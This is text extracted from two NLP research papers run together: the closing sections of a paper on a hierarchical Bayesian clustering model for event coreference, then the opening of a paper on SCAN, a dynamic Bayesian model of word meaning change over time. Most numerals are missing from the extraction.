mentions within doc- uments and then grouping within-document clusters to larger clusters across documents. we compute the pairwise-linkage scores using the log-linear model described in section . . • hdp-lex: an unsupervised bayesian clus- tering model for within- and cross-document event coreference (bejan and harabagiu, ) . it is a hierarchical dirichlet process (hdp) model with the likelihood of all the lem- matized words observed in the event mentions. in general, the hdp can be formulated using a two-level sequential crp. our hddcrp model is a two-level ddcrp that generalizes the hdp to allow data dependencies to be incorporated at both levels . • ddcrp: a ddcrp model we develop for event coreference resolution. it applies the distance prior in equation to all pairs of event men- tions in the corpus, ignoring the document boundaries. 
it uses the same likelihood func- tion and the same log-linear model to learn the distance values as hddcrp. but it has fewer link variables than hddcrp and it does not distinguish between the within-document and cross-document link variables. for the same clustering structure, hddcrp can gener- ate more possible link configurations than dd- crp. • hddcrp∗: a variant of the proposed hddcrp that only incorporates the within-document de- pendencies but not the cross-document depen- dencies. the generative process of hddcrp∗ is similar to the one described in section . , ex- cept that in step , for each table t, we sample we re-implement the proposed hdp-based models: the hdp f , hdpflat (including hdpflat (lf), (lf+wf), and (lf+wf+sf)) and hdpstruct, but found that the hdpflat with lexical features (lf) performs the best in our experiments. we refer to it as hdp-lex. note that hdp-lex is not a special case of hddcrp be- cause we define the table-level distance function as the distances between customers instead of between tables. in our model, the probability of linking a table t to another table s depends on the distance between the head customer at table t and all other customers who sit at table s. defining the table-level distance function this way allows us to derive a tractable inference algo- rithm using gibbs sampling. a cluster assignment ct according to p(ct = k) ∝ { nk, k ≤ k α , k = k + where k is the number of existing clusters, nk is the number of existing tables that be- long to cluster k, α is the concentration param- eter. and in step , the clusters z(a,c) are con- structed by traversing the customer links and looking up the cluster assignments for the ob- tained tables. we also use gibbs sampling for inference. . parameter settings for all the bayesian models, the reported results are averaged results over five mcmc runs, each for iterations. we found that mixing happens before iterations in all models by observing the joint log-likelihood. for the ddcrp, hddcrp∗ and hdd- crp, we randomly initialized the link variables. be- fore initialization, we assume that each mention be- longs to its own cluster. we assume mentions are ordered according to their appearance within a doc- ument, but we do not assume any particular ordering of documents. we also truncated the pairwise men- tion similarity to zero if it is below . as we found that it leads to better performance on the develop- ment set. we set α = ... = αd = . , α = . for hddcrp, α = for hddcrp∗, α = . for dd- crp, and λ = − . all the hyperparameters were set based on the development data. . main results table shows the event coreference results. we can see that lemma-matching is a strong baseline for event coreference resolution. hdp-lex provides noticeable improvements, suggesting the benefit of using an infinite mixture model for event cluster- ing. agglomerative further improves the per- formance over hdp-lex for wd resolution, how- ever, it fails to improve cd resolution. we conjec- ture that this is due to the combination of ineffective thresholding and the prediction errors on the pair- wise distances between mention pairs across docu- ments. overall, hddcrp∗ outperforms all the base- lines in conll f for both wd and cd evaluation. the clear performance gains over hdp-lex demon- strate that it is important to account for pairwise mention dependencies in the generative modeling of event clustering. 
the improvements over agglom- erative indicate that it is more effective to model mention-pair dependencies as clustering priors than as heuristics for deterministic clustering. comparing among the hddcrp-related models, we can see that hddcrp clearly outperforms dd- crp, demonstrating the benefits of incorporating the hierarchy into the model. hddcrp also performs better than hddcrp∗ in wd conll f , indicat- ing that incorporating cross-document information helps within-document clustering. we can also see that hddcrp performs similarly to hddcrp∗ in cd conll f due to the lower b f , in particular, the decrease in b recall. this is because apply- ing the ddcrp prior at both within- and cross- document levels results in more conservative clus- tering and produces smaller clusters. this could be potentially improved by employing more accurate similarity priors. to further understand the effect of modeling mention-pair dependencies, we analyze the impact of the features in the mention-pair similarity model. table lists the learned weights of some top features (sorted by weights). we can see that they mainly serve to discriminate event mentions based on the head word similarity (especially embedding-based similarity) and the context word similarity. event argument information such as srl arg , srl arg , and participant are also indicative of the coreferen- tial relations. . discussion we found that hddcrp corrects many errors made by the traditional agglomerative clustering model (agglomerative) and the unsupervised genera- tive model (hdp-lex). agglomerative easily suffers from error propagation as the errors made by the supervised distance learner cannot be cor- rected. hdp-lex often mistakenly groups mentions together based on word co-occurrence statistics but not the apparent similarity features in the mentions. in contrast, hddcrp avoids such errors by perform- ing probabilistic modeling of clustering and mak- ing use of rich linguistic features trained on avail- able annotated data. for example, hddcrp cor- rectly groups the event mention “unveiled” in “ap- ple’s phil schiller unveiled a revamped macbook muc b ceafe conll p r f p r f p r f f cross-document event coreference resolution (cd) lemma . . . . . . . . . . hdp-lex . . . . . . . . . . agglomerative . . . . . . . . . . ddcrp . . . . . . . . . . hddcrp∗ . . . . . . . . . . hddcrp . . . . . . . . . . within-document event coreference resolution (wd) lemma . . . . . . . . . . hdp-lex . . . . . . . . . . agglomerative . . . . . . . . . . ddcrp . . . . . . . . . . hddcrp∗ . . . . . . . . . . hddcrp . . . . . . . . . . table : within- and cross-document coreference results on the ecb+ corpus pro today” together with the event mention “an- nounced” in “this notebook isn’t the only laptop ap- ple announced for the macbook pro lineup today”, while both hdp-lex and agglomerative models fail to make such connection. by looking further into the errors, we found that a lot of mistakes made by hddcrp are due to the errors in event extraction and pairwise linkage pre- diction. the event extraction errors include false positive and false negative event mentions and event arguments, boundary errors for the extracted men- tions, and argument association errors. 
the pairwise linking errors often come from the lack of seman- tic and world knowledge, and this applies to both event mentions and event arguments, especially for time and location arguments which are less likely to be repeatedly mentioned and in many cases re- quire external knowledge to resolve their meanings, e.g., “may , ” is “friday” and “mount cook” is “new zealand’s highest peak”. conclusion in this paper we propose a novel bayesian model for within- and cross-document event coreference resolution. it leverages the advantages of genera- tive modeling of coreference resolution and feature- rich discriminative modeling of mention reference relations. we have shown its power in resolving event coreference by comparing it to a traditional ag- features weight head embedding sim . string match . context sim . synonym sim . tf sim . srl arg sim . srl arg sim . participant sim . table : learned weights for selected features glomerative clustering approach and a state-of-the- art unsupervised generative clustering approach. it is worth noting that our model is general and can be easily applied to other clustering problems involving feature-rich objects and cluster sharing across data groups. while the model can effectively cluster ob- jects of a single type, it would be interesting to ex- tend it to allow joint clustering of objects of different types, e.g., events and entities. acknowledgments we thank cristian danescu-niculescu-mizil, igor labutov, lillian lee, moontae lee, jon park, chen- hao tan, and other cornell nlp seminar partici- pants and the reviewers for their helpful comments. this work was supported in part by nsf grant iis- and darpa deft grant fa - - - . the third author was supported by nsf career cmmi- , nsf iis- , afosr fa - - - , afosr fa - - - , and the acsf avf. the views and conclu- sions contained herein are those of the authors and should not be interpreted as necessarily represent- ing the official policies or endorsements, either ex- pressed or implied, of nsf, darpa or the u.s. government. references david ahn. . the stages of event extraction. in proceedings of the workshop on annotating and rea- soning about time and events, pages – . amit bagga and breck baldwin. . algorithms for scoring coreference chains. in the first international conference on language resources and evaluation workshop on linguistics coreference, volume , pages – . cosmin adrian bejan and sanda harabagiu. . un- supervised event coreference resolution with rich lin- guistic features. in acl, pages – . cosmin adrian bejan and sanda harabagiu. . un- supervised event coreference resolution. computa- tional linguistics, ( ): – . indrajit bhattacharya and lise getoor. . a latent dirichlet model for unsupervised entity resolution. in sdm, volume , page . david m. blei and peter i. frazier. . distance de- pendent chinese restaurant processes. the journal of machine learning research, : – . claire cardie and kiri wagstaff. . noun phrase coreference as clustering. in proceedings of the joint sigdat conference on empirical methods in natural language processing and very large cor- pora, pages – . zheng chen, heng ji, and robert haralick. . a pairwise event coreference model, feature impact and evaluation for event coreference resolution. in pro- ceedings of the workshop on events in emerging text types, pages – . agata cybulska and piek vossen. a. guidelines for ecb+ annotation of events and their coreference. technical report, nwr- - , vu university ams- terdam. agata cybulska and piek vossen. b. 
using a sledgehammer to crack a nut? lexical diversity and event coreference resolution. in proceedings of the th language resources and evaluation conference (lrec ), pages – . greg durrett and dan klein. . easy victories and uphill battles in coreference resolution. in emnlp, pages – . soumya ghosh, andrei b. ungureanu, erik b. sudderth, and david m. blei. . spatial distance depen- dent chinese restaurant processes for image segmen- tation. in advances in neural information processing systems, pages – . soumya ghosh, michalis raptis, leonid sigal, and erik b. sudderth. . nonparametric clustering with distance dependent hierarchies. aria haghighi and dan klein. . unsupervised coreference resolution in a nonparametric bayesian model. in acl, volume , page . aria haghighi and dan klein. . coreference reso- lution in a modular, entity-centered model. in naacl, pages – . kevin humphreys, robert gaizauskas, and saliha az- zam. . event coreference for information extrac- tion. in proceedings of a workshop on operational factors in practical, robust anaphora resolution for unrestricted texts, pages – . andrew kehler. . coherence, reference, and the theory of grammar. csli publications stanford, ca. dongwoo kim and alice oh. . accounting for data dependencies within a hierarchical dirichlet process mixture model. in proceedings of the th acm inter- national conference on information and knowledge management, pages – . heeyoung lee, yves peirsman, angel chang, nathanael chambers, mihai surdeanu, and dan jurafsky. . stanford’s multi-pass sieve coreference resolution sys- tem at the conll- shared task. in proceedings of the fifteenth conference on computational natural language learning: shared task, pages – . heeyoung lee, marta recasens, angel chang, mihai surdeanu, and dan jurafsky. . joint entity and event coreference resolution across documents. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning, pages – . zhengzhong liu, jun araki, eduard hovy, and teruko mitamura. . supervised within-document event coreference using information propagation. in pro- ceedings of the international conference on language resources and evaluation. xiaoqiang luo. . on coreference resolution perfor- mance metrics. in emnlp, pages – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. proceedings of workshop at iclr. vincent ng and claire cardie. . improving ma- chine learning approaches to coreference resolution. in acl, pages – . vincent ng. . supervised noun phrase coreference research: the first fifteen years. in acl, pages – . sameer pradhan, xiaoqiang luo, marta recasens, ed- uard hovy, vincent ng, and michael strube. . scoring coreference partitions of predicted mentions: a reference implementation. in acl, pages – . karthik raghunathan, heeyoung lee, sudarshan ran- garajan, nathanael chambers, mihai surdeanu, dan jurafsky, and christopher manning. . a multi- pass sieve for coreference resolution. in emnlp, pages – . altaf rahman and vincent ng. . coreference reso- lution with world knowledge. in acl, pages – . michael roth and anette frank. . aligning pred- icate argument structures in monolingual comparable texts: a new corpus for a new task. in semeval, pages – . sunita sarawagi and william w. cohen. . semi- markov conditional random fields for information ex- traction. in advances in neural information process- ing systems, pages – . 
sameer singh, michael wick, and andrew mccallum. . distantly labeling data for large scale cross-document coreference. arxiv preprint.
richard socher, andrew l. maas, and christopher d. manning. . spectral chinese restaurant processes: nonparametric clustering based on similarities. in international conference on artificial intelligence and statistics, pages – .
veselin stoyanov, nathan gilbert, claire cardie, and ellen riloff. . conundrums in noun phrase coreference resolution: making sense of the state-of-the-art. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp, pages – .
mihai surdeanu, lluís màrquez, xavier carreras, and pere r. comas. . combination strategies for semantic role labeling. journal of artificial intelligence research, pages – .
yee whye teh, michael i. jordan, matthew j. beal, and david m. blei. . hierarchical dirichlet processes. journal of the american statistical association, ( ).
marc vilain, john burger, john aberdeen, dennis connolly, and lynette hirschman. . a model-theoretic coreference scoring scheme. in proceedings of the th conference on message understanding, pages – .
michael wick, sameer singh, and andrew mccallum. . a discriminative hierarchical model for fast coreference at large scale. in acl, pages – .
travis wolfe, mark dredze, and benjamin van durme. . predicate argument alignment using a global coherence model. in naacl, pages – .
bishan yang and claire cardie. . joint modeling of opinion expression extraction and attribute classification. transactions of the association for computational linguistics, : – .
https://transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/a-bayesian-model-of-diachronic-meaning-change(d f -eee - e - bc- b b d ef).html a bayesian model of diachronic meaning change lea frermann and mirella lapata institute for language, cognition and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab l.frermann@ed.ac.uk, mlap@inf.ed.ac.uk abstract word meanings change over time and an au- tomated procedure for extracting this infor- mation from text would be useful for histor- ical exploratory studies, information retrieval or question answering. we present a dy- namic bayesian model of diachronic meaning change, which infers temporal word represen- tations as a set of senses and their prevalence. unlike previous work, we explicitly model language change as a smooth, gradual pro- cess. we experimentally show that this model- ing decision is beneficial: our model performs competitively on meaning change detection tasks whilst inducing discernible word senses and their development over time. application of our model to the semeval- temporal classification benchmark datasets further re- veals that it performs on par with highly op- timized task-specific systems. introduction language is a dynamic system, constantly evolv- ing and adapting to the needs of its users and their environment (aitchison, ). words in all lan- guages naturally exhibit a range of senses whose dis- tribution or prevalence varies according to the genre and register of the discourse as well as its historical context. as an example, consider the word cute which according to the oxford english dictionary (oed, stevenson ) first appeared in the early th century and originally meant clever or keen- witted. by the late th century cute was used in throughout this paper we denote words in true type, their senses in italics, and sense-specific context words as {lists}. the same sense as cunning. today it mostly refers to objects or people perceived as attractive, pretty or sweet. another example is the word mouse which initially was only used in the rodent sense. the oed dates the computer pointing device sense of mouse to . the latter sense has become par- ticularly dominant in recent decades due to the ever- increasing use of computer technology. the arrival of large-scale collections of historic texts (davies, ) and online libraries such as the internet archive and google books have greatly facilitated computational investigations of language change. the ability to automatically detect how the meaning of words evolves over time is potentially of significant value to lexicographic and linguistic research but also to real world applications. time- specific knowledge would presumably render word meaning representations more accurate, and benefit several downstream tasks where semantic informa- tion is crucial. examples include information re- trieval and question answering, where time-related information could increase the precision of query disambiguation and document retrieval (e.g., by re- turning documents with newly created senses or fil- tering out documents with obsolete senses). in this paper we present a dynamic bayesian model of diachronic meaning change. word mean- ing is modeled as a set of senses, which are tracked over a sequence of contiguous time intervals. we infer temporal meaning representations, consisting of a word’s senses (as a probability distribution over words) and their relative prevalence. 
our model is thus able to detect that mouse had one sense until the mid- th century (characterized by words such as {cheese, tail, rat}) and subsequently acquired a transactions of the association for computational linguistics, vol. , pp. – , . action editor: tim baldwin. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. second sense relating to computer device. more- over, it infers subtle changes within a single sense. for instance, in the s the words {cable, ball, mousepad} were typical for the computer device sense, whereas nowadays the terms {optical, laser, usb} are more typical. contrary to previous work (mitra et al., ; mihalcea and nastase, ; gu- lordava and baroni, ) where temporal represen- tations are learnt in isolation, our model assumes that adjacent representations are co-dependent, thus capturing the nature of meaning change being fun- damentally smooth and gradual (mcmahon, ). this also serves as a form of smoothing: temporally neighboring representations influence each other if the available data is sparse. experimental evaluation shows that our model (a) induces temporal representations which reflect word senses and their development over time, (b) is able to detect meaning change between two time pe- riods, and (c) is expressive enough to obtain useful features for identifying the time interval in which a piece of text was written. overall, our results indi- cate that an explicit model of temporal dynamics is advantageous for tracking meaning change. com- parisons across evaluations and against a variety of related systems show that despite not being designed with any particular task in mind, our model performs competitively across the board. related work most work on diachronic language change has fo- cused on detecting whether and to what extent a word’s meaning changed (e.g., between two epochs) without identifying word senses and how these vary over time. a variety of methods have been applied to the task ranging from the use of statistical tests in order to detect significant changes in the distribution of terms from two time periods (popescu and strap- parava, ; cook and stevenson, ), to train- ing distributional similarity models on time slices (gulordava and baroni, ; sagi et al., ), and neural language models (kim et al., ; kulkarni et al., ). other work (mihalcea and nastase, ) takes a supervised learning approach and pre- dicts the time period to which a word belongs given its surrounding context. bayesian models have been previously developed for various tasks in lexical semantics (brody and la- pata, ; ó séaghdha, ; ritter et al., ) and word meaning change detection is no exception. using techniques from non-parametric topic model- ing, lau et al. ( ) induce word senses (aka. top- ics) for a given target word over two time periods. novel senses are then are detected based on the discrepancy between sense distributions in the two periods. follow-up work (cook et al., ; lau et al., ) further explores methods for how to best measure this sense discrepancy. rather than infer- ring word senses, wijaya and yeniterzi ( ) use a topics-over-time model and k-means clustering to identify the periods during which selected words move from one topic to another. a non-bayesian approach is put forward in mi- tra et al. ( , ) who adopt a graph-based framework for representing word meaning (see tah- masebi et al. ( ) for a similar earlier proposal). 
in this model words correspond to nodes in a se- mantic network and edges are drawn between words sharing contextual features (extracted from a depen- dency parser). a graph is constructed for each time interval, and nodes are clustered into senses with chinese whispers (biemann, ), a randomized graph clustering algorithm. by comparing the in- duced senses for each time slice and observing inter- cluster differences, their method can detect whether senses emerge or disappear. our work draws ideas from dynamic topic mod- eling (blei and lafferty, b) where the evolu- tion of topics is modeled via (smooth) changes in their associated distributions over the vocabulary. although the dynamic component of our model is closely related to previous work in this area (mimno et al., ), our model is specifically constructed for capturing sense rather than topic change. our ap- proach is conceptually similar to lau et al. ( ). we also learn a joint sense representation for multi- ple time slices. however, in our case the number of time slices in not restricted to two and we explicitly model temporal dynamics. like mitra et al. ( , ), we model how senses change over time. in our model, temporal representations are not inde- pendent, but influenced by their temporal neighbors, encouraging smooth change over time. we therefore induce a global and consistent set of temporal repre- sentations for each word. our model is knowledge- lean (it does not make use of a parser) and language independent (all that is needed is a time-stamped corpus and tools for basic pre-processing). contrary to mitra et al. ( , ), we do not treat the tasks of inferring a semantic representation for words and their senses as two separate processes. evaluation of models which detect meaning change is fraught with difficulties. there is no stan- dard set of words which have undergone meaning change or benchmark corpus which represents a va- riety of time intervals and genres, and is thematically consistent. previous work has generally focused on a few hand-selected words and models were evalu- ated qualitatively by inspecting their output, or the extent to which they can detect meaning changes from two time periods. for example, cook et al. ( ) manually identify target words which un- dergo meaning change in a focus corpus with re- spect to a reference corpus (both news text). they then assess how their models fare at learning sense differences for these targets compared to distractors which did not undergo meaning change. they also underline the importance of using thematically com- parable reference and focus corpora to avoid spuri- ous differences in word representations. in this work we evaluate our model’s ability to detect and quantify meaning change across several time intervals (not just two). instead of relying on a few hand-selected target words, we use larger sets sampled from our learning corpus or found to undergo meaning change in a judgment elicitation study (gulordava and baroni, ). in addition, we adopt the evaluation paradigm of mitra et al. ( ) and validate our findings against wordnet. finally, we apply our model to the recently es- tablished semeval- diachronic text evaluation subtasks (popescu and strapparava, ). in order to present a consistent set of experiments, we use our own corpus throughout which covers a wider range of time intervals and is compiled from a variety of genres and sources and is thus thematically coher- ent (see section for details). 
wherever possible, we compare against prior art, with the caveat that the use of a different underlying corpus unavoidably influences the obtained semantic representations. a bayesian model of sense change in this section we introduce scan, our dynamic bayesian model of sense change. scan captures how a word’s senses evolve over time (e.g., whether new senses emerge), whether some senses become more or less prevalent, as well as phenomena per- taining to individual senses such as meaning exten- sion, shift, or modification. we assume that time is discrete, divided into contiguous intervals. given a word, our model infers its senses for each time in- terval and their probability. it captures the gradual nature of meaning change explicitly, through depen- dencies between temporally adjacent meaning rep- resentations. senses themselves are expressed as a probability distribution over words, which can also change over time. . model description we create a scan model for each target word c. the input to the model is a corpus of short text snippets, each consisting of a mention of the target word c and its local context w (in our experiments this is a sym- metric context window of ± words). each snip- pet is annotated with its year of origin. the model is parametrized with regard to the number of senses k ∈ [ ...k] of the target word c, and the length of time intervals ∆t which might be finely or coarsely defined (e.g., spanning a year or a decade). we conflate all documents originating from the same time interval t ∈ [ ...t] and infer a tempo- ral representation of the target word per interval. a temporal meaning representation for time t is (a) a k-dimensional multinomial distribution over word senses φt and (b) a v -dimensional distribution over the vocabulary ψt,k for each word sense k. in ad- dition, our model infers a precision parameter κφ, which controls the extent to which sense prevalence changes for word c over time (see section . for details on how we model temporal dynamics). we place individual logistic normal priors (blei and lafferty, a) on our multinomial sense dis- tributions φ and sense-word distributions ψk. a draw from the logistic normal distribution con- sists of (a) a draw of an n-dimensional random vector x from the multivariate normal distribution parametrized by an n-dimensional mean vector µ and a n × n variance-covariance matrix Σ, x ∼ n(x|µ, Σ); and (b) a mapping of the drawn param- eters to the simplex through the logistic transforma- tion φn = exp(xn)/ ∑ n′ exp(xn′ ), which ensures a draw of valid multinomial parameters. the normal distributions are parametrized to encourage smooth wz z w z w φt− φt φt+ κφa,b ψt− ψt ψt+ κψ i dt− i dt i dt+ k draw κφ ∼ gamma(a,b) for time interval t = ..t do draw sense distribution φt|φ−t,κφ ∼n( (φt− + φt+ ),κφ) for sense k = ..k do draw word distribution ψt,k|ψ−t,κψ ∼n( (ψt− ,k+ψt+ ,k),κψ) for document d = ..d do draw sense zd ∼ mult(φt) for context position i = ..i do draw word wd,i ∼ mult(ψt,zd ) figure : left: plate diagram for the dynamic sense model for three time steps {t− , t, t+ }. constant parameters are shown as dashed nodes, latent variables as clear nodes, and observed variables as gray nodes. right: the corresponding generative story. change in multinomial parameters, over time (see section . for details), and the extent of change is controlled through a precision parameter κ. 
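the two-step draw just described — a gaussian sample followed by the logistic (softmax) transformation — can be illustrated with the short python sketch below; the dimensionality and covariance are arbitrary example values, not the parameterisation used in the paper.

```python
import numpy as np

def logistic_normal_draw(mu, cov, rng):
    """Draw x ~ N(mu, cov), then map it onto the simplex with the logistic
    (softmax) transformation, yielding valid multinomial parameters."""
    x = rng.multivariate_normal(mu, cov)
    e = np.exp(x - x.max())                 # subtract the max for stability
    return e / e.sum()

rng = np.random.default_rng(0)
K = 4                                        # e.g. number of senses (illustrative)
phi_t = logistic_normal_draw(np.zeros(K), 0.5 * np.eye(K), rng)
print(phi_t, phi_t.sum())                    # a sense distribution for one interval
```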
we learn the value of κφ during inference, which al- lows us to model the extent of temporal change in sense prevalence individually for each target word. we draw κφ from a conjugate gamma prior. we do not infer the sense-word precision parameter κψ on all ψk. instead, we fix it at a high value, trig- gering little variation of word distributions within senses. this leads to senses being thematically co- herent over time. we now describe the generative story of our model, which is depicted in figure (right), along- side its plate diagram representation (left). first, we draw the sense precision parameter κφ from a gamma prior. for each time interval t we draw (a) a multinomial distribution over senses φt from a lo- gistic normal prior; and (b) a multinomial distribu- tion over the vocabulary ψt,k for each sense k, from another logistic normal prior. next, we generate time-specific text snippets. for each snippet d, we first observe the time interval t, and draw a sense zd from mult(φt). finally, we generate i context words wd,i independently from mult(ψt,z d ). . background on igmrfs let φ = {φ ...φt} denote a t-dimensional random vector, where each φt might for example correspond to a sense probability at time t. we define a prior which encourages smooth change of parameters at neighboring times, in terms of a first order random walk on the line (graphically shown in figure , and the chains of φ and ψ in figure (left)). specifically, we define this prior as an intrinsic gaussian markov random field (igmrf; rue and held ), which allows us to model the change of adjacent parame- ters as drawn from a normal distribution, e.g.: ∆φt ∼n( ,κ− ). ( ) the igmrf is defined with respect to the graph in figure ; it is sparsely connected with only first- order dependencies which allows for efficient in- ference. a second feature, which makes igmrfs popular as priors in bayesian modeling, is the fact that they can be defined purely in terms of the lo- cal changes between dependent (i.e., adjacent) vari- ables, without the need to specify an overall mean of the model. the full conditionals explicitly cap- ture these intuitions: φt|φ−t,κ ∼n ( (φt− + φt+ ), κ ) , ( ) for < t < t , where φ−t is the vector φ ex- cept element φt and κ is a precision parameter. the value of parameter φt is distributed normally, cen- tered around the mean of the values of its neighbors, without reference to a global mean. the precision parameter κ controls the extent of variation: how tightly coupled are the neighboring parameters? or, φ φt− φt φt+ φt figure : a linear chain igmrf. in our case: how tightly coupled are temporally ad- jacent meaning representations of a word c? we es- timate the precision parameter κφ during inference. this allows us to flexibly capture sense variation over time individually for each target word. for a detailed introduction to (i)gmrfs we refer the interested reader to rue and held ( ). for an application of igmrfs to topic models see mimno et al. ( ). . inference we use a blocked gibbs sampler for approximate in- ference. the logistic normal prior is not conjugate to the multinomial distribution. this means that the straightforward parameter updates known for sam- pling standard, dirichlet-multinomial, topic models do not apply. however, sampling-based methods for logistic normal topic models have been proposed in the literature (mimno et al., ; chen et al., ). 
at each iteration, we sample: (a) document- sense assignments, (b) multinomial parameters from the logistic normal prior, and (c) the sense preci- sion parameter from a gamma prior. our blocked sampler first iterates over all input text snippets d with context w, and re-samples their sense assign- ments under the current model parameters {φ}t and {ψ}k×t , p(zd|w, t,φ,ψ) ∝ p ( zd|t ) p ( w|t,zd ) = φt zd ∏ w∈w ψt,z d w ( ) next, we re-sample parameters {φ}t and {ψ}k×t from the logistic normal prior, given the current sense assignments. we use the auxiliary variable method proposed in mimno et al. ( ) (see also groenewald and mokgatlhe ( )). intuitively, each individual parameter (e.g., sense k’s prevalence at time t, φtk) is ‘shifted’ within a weighted region which is bounded by the number of times sense k was observed at time t. the weights of the region are determined by the prior, in our case the normal distributions defined by the igmrf, which ensure corpus years covered #words coha – , , dte – , clmet . – , , table : size and coverage of our three training corpora (after pre-processing). an influence of temporal neighbors φt− k and φ t+ k on the new parameter value φtk, and smooth tempo- ral variation as desired. the same procedure applies to each word parameter under each {time, sense} ψ t,k w (see mimno et al. for a more detailed de- scription of the sampler). finally, we periodically re-sample the sense precision parameter κφ from its conjugate gamma prior. the date corpus before presenting our evaluation we describe the corpus used as a basis for the experiments per- formed in this work. we applied our model to a diachronic text corpus (date) which collates documents spanning years – from three sources: (a) the coha corpus (davies, ), a large collection of texts from various genres cover- ing the years – ; (b) the training data pro- vided by the dte task organizers (see section ); and (c) the portion of the clmet . corpus (diller et al., ) corresponding to the period – (which is not covered by the coha corpus and thus underrepresented in our training data). clmet . contains texts representative of a range of genres in- cluding narrative fiction, drama, letters, and was col- lected from various online archives. table pro- vides details on the size of our corpus. documents were clustered by their year of pub- lication as indicated in the original corpora. in the clmet . corpus, occasionally a range of years would be provided. in this case we used the fi- nal year of the range. we tokenized, lemmatized, and part of speech tagged date using the nltk (bird et al., ). we removed stopwords and func- tion words. after preprocessing, we extracted target http://corpus.byu.edu/coha/ http://alt.qcri.org/semeval /task / index.php?id=data-and-tools http://www.kuleuven.be/˜u / clmet _ .htm http://corpus.byu.edu/coha/ http://alt.qcri.org/semeval /task /index.php?id=data-and-tools http://alt.qcri.org/semeval /task /index.php?id=data-and-tools http://www.kuleuven.be/~u /clmet _ .htm http://www.kuleuven.be/~u /clmet _ .htm word-specific input corpora for our models. these consisted of mentions of a target c and its surround- ing context, a symmetric window of ± words. experiment : temporal dynamics as discussed earlier our model departs from previ- ous approaches (e.g., mitra et al. ) in that it learns globally consistent temporal representations for each word. 
in order to assess whether temporal dependencies are indeed beneficial, we implemented a stripped-down version of our model (scan-not) which does not have any temporal dependencies be- tween individual time steps (i.e., without the chain igmrf priors). word meaning is still represented as senses and sense prevalence is modeled as a dis- tribution over senses for each time interval. how- ever, time intervals are now independent. inference works as described in section . , without having to learn the κ precision parameters. models and parameters we compared the two models in terms of their predictive power. we split the date corpus into a training period {d ...dt} of time slices through t and computed the like- lihood p(dt+ |φt,ψt) of the data at test time slice t + , under the parameters inferred for the previous time slice. the time slice size was set to ∆t = years. we set the number of senses to k = , the word precision parameter κψ = , a high value which enforces individual senses to re- main thematically consistent across time. we set the initial sense precision parameter κφ = , and the gamma parameters a = and b = . these pa- rameters were optimized once on the development data used for the task-based evaluation discussed in section . unless otherwise specified all ex- periments use these values. no parameters were tuned on the test set for any task. in all exper- iments we ran the gibbs sampler for , itera- tions, and resampled κφ after every iterations, starting from iteration . we used the final state of the sampler throughout. we randomly selected mid-frequency target concepts from a larger set of target concepts described in section . predictive loglikelihood scores were averaged across concepts and were calculated as the average under param- eter samples {φt,ψt} from the trained models. - - - - − , − , · predicted time period lo gl ik el ih oo d scan scan-not figure : predictive log likelihood of scan and a ver- sion without temporal dependencies (scan-not) across various test time periods. results figure displays predictive loglikelihood scores for four test time intervals. scan outper- forms its stripped-down version throughout (higher is better). since the representations learnt by scan are influenced (or smoothed) by neighboring repre- sentations, they overfit specific time intervals less which leads to better predictive performance. fig- ure further shows how scan models meaning change for the words band, power, transport and bank. the sense distributions over time are shown as a sequence of stacked histograms, senses themselves are color-coded (and enumerated) below, in the same order as in the histograms. each sense k is illustrated as the words w assigned the highest posterior probability, marginalizing over the time- specific representations p(w|k) = ∑ t ψ t,k w . words representative of prevalent senses are highlighted in bold face. figure (top left) demonstrates that the model is able to capture various senses of the word band, such as strip used for binding (yellow bars/number in the figure) or musical band (grey/ , orange/ ). our model predicts an increase in prevalence over the modeled time period for both senses. this is cor- roborated by the oed which provides the majority of references for the binding strip sense for the th century and dates the musical band sense to . in addition a social band sense (violet/ , darkgreen/ ; in the sense of bonding) emerges, which is present across time slices. 
the sense colored brown/ refers to the british band, a group of native americans involved in the black hawk war in , and the model indeed indicates a prevalence of this sense around this time (see bars – in the figure). for the word power (figure (top right)), band band play people time little call father day love boy play band music time country day march military frequency jazz little hand play land love time night speak strong name little soldier leader time land arm hand country war indian music play dance band hear time little evening stand house black white hat broad gold wear hair band head rubber indian little day horse time people meet chief leave war play music hand hear sound march street air look strike power power idea god hand mind body life time object nature power nation world war country time government sir mean lord power time company water force line electric plant day run power government law congress executive president legislative constitution love power life time woman heart god tell little day mind power time life friend woman nature love world reason power people law government mind call king time hand nature power country government nation war increase world political people europe transport road cost public railway transport rail average service bus time ozone epa example section transport air policy region measure caa time transport land public ship line water vessel london joy air plane ship army day transport land look leave hand time road worker union service public system industry air railway air international worker plane association united union aircraft line president troop ship day land army war send plane supply fleet air joy love heart heaven time company eye hand smile bank bank tell cashier teller money day ned president house city bank note money deposit credit amount pay species issue bill bank money national note government credit united time currency loan bank dollar money note national president account director company little river day opposite mile bank danube town left country shore bank capital company stock rate national president fund city loan river water stream foot mile tree stand reach little land note bank money time tell leave hard day dollar account figure : tracking meaning change for the words band, power, transport and bank over -year time intervals between and . each bar shows the proportion of each sense (color-coded) and is labeled with the start year of the respective time interval. senses are shown as the most probable words, and particularly representative words are highlighted for illustration. time p (w |s , t ) time line water water company company power power company power power power nuclear line time power force power water company company power company plant nuclear power power water line company time power force force force plant nuclear plant plant water power time power force force water time plant electric electric time utility force force force line water time electric water water time time company company war war company time steam day day plant day force company utility time run day run steam electric line time day time day run run people equal house electric day run steam steam electric electric run utility electric energy carry run steam electric day purchase line steam run water day cost cost electric company day run plant run plant run line people force people run figure : sense-internal temporal dynamics for the energy sense of the word power (violet/ in figure ). 
